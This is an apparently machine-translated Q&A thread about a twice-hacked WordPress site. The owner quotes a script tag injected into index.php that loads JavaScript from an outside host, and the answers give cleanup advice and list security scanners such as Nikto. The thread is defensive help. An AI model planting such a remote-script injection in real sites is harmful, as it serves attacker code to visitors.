Wordpress网站再次入侵

时间:2011-12-07 09:39:21

标签: javascript wordpress xss

网站已被黑客攻击两次同样的问题我一直要下载网站并做一个查找和替换修复它但似乎没有解决我的问题

这是他们在wordpress中的index.php文件中插入的代码,该文件的权限设置为644.

<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script>

我在想它可能是一个sql注入,因为所有文件和文件夹都被锁定到正确的权限644 755等。

可以somebodt告诉我一个mac SQL Injection测试工具,我可以用来测试,我已经阅读了另一篇文章,并将我所有的ftp帐户更改为sftp以确保这一点,是我还缺少的其他东西吗?

感谢

2 个答案:

答案 0 :(得分:1)

查找和替换不是解决这个问题的好方法,因为它很容易错过你不知道的具体内容。恢复干净的备份是最好的方法。使用v防病毒插件可以提供帮助。最后的办法是通过xml导出导出你的内容并从头开始。 。 。

专业提示:

查找不应该存在的PHP文件,比如在uploads文件夹中应该只有index.php文件夹,并且它应该只有“// Silence is golden”c消息。如果那里有任何其他PHP文件。 。

祝你好运!

答案 1 :(得分:0)

这里有许多工具,分为2个部分;在线和下载: http://www.malwarehelp.org/freeware-open-source-commercial-website-security-tools-services-downloads.html

你也可以在你的Mac上使用这个,但它需要基本的Perl安装。 http://www.cirt.net/nikto2